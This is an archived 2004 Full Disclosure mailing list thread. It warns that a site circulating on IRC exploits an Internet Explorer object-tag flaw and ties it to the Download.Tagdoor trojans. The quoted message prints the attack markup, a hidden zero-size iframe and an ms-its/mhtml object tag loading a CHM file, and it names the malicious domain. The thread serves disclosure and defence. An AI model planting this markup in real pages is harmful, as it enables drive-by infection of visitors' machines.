Full Disclosure mailing list archives

Re: IE exploit going around on irc

From: David Jacoby <bugtraq () pewp hack se>
Date: Tue, 06 Apr 2004 08:37:44 +0200

I just found this information:

http://securityresponse.symantec.com/avcenter/venc/data/download.tagdoor.html

"Download.Tagdoor is a group of Trojan horses that exploit the Internet
Explorer Object Tag Vulnerability. (This is described in Microsoft
Security Bulletin MS03-032. )"

((pewp))


On Mon, 2004-04-05 at 19:52, Niek Baakman wrote:

Hi list,

this thing's been going around on irc the last few days:

www.divx.dc-hub.com (IE users don't click it!)
check source:
<iframe src='loi.htm' width=0 height=0></iframe>

loi.htm contains:
    <object
    data="ms-its:mhtml:file://C:\winhelp.mht!${PATH}/LOI.CHM::/loi.htm"
    type="text/x-scriptlet"></object>


LOI.CHM is attached

Regards,

Niek Baakman


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

IE exploit going around on irc Niek Baakman (Apr 05)
- Re: IE exploit going around on irc François Harvey (Apr 05)
- Re: IE exploit going around on irc David Jacoby (Apr 06)
- <Possible follow-ups>
- Re: IE exploit going around on irc http-equiv () excite com (Apr 05)
- IE exploit going around on irc Feher Tamas (Apr 06)
- RE: IE exploit going around on irc Thor Larholm (Apr 06)
  - Re: IE exploit going around on irc Jelmer (Apr 06)
- Re: IE exploit going around on irc http-equiv () excite com (Apr 06)
- RE: IE exploit going around on irc Thor Larholm (Apr 06)
  - Re: IE exploit going around on irc Jelmer (Apr 06)
- Re: IE exploit going around on irc Lise Moorveld (Apr 07)